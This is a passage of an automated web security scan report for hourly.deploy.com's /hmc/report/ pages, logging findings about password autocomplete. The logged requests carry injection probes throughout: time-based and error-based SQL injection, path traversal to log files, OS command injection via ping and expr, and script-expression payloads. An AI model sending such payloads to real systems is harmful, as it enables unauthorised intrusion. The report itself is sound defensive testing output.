                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.139. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../var/log/apache/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.140. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.141. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt='%3E%3Cnet%20sparker=netsparker(0x000025)%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt='%3e%3cnet%20sparker=netsparker(0x000025)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.142. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.143. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='+OR+'ns'%3d'ns HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'ns'%3d'ns" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.144. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.145. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.146. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e302e62600f5f7a4b68;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.147. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.148. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.149. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=print(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=print(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.150. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x000044))%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x000044))%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.151. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.152. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.153. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.154. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.155. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=;ns:expression(netsparker(0x000049)); HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=;ns:expression(netsparker(0x000049));" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

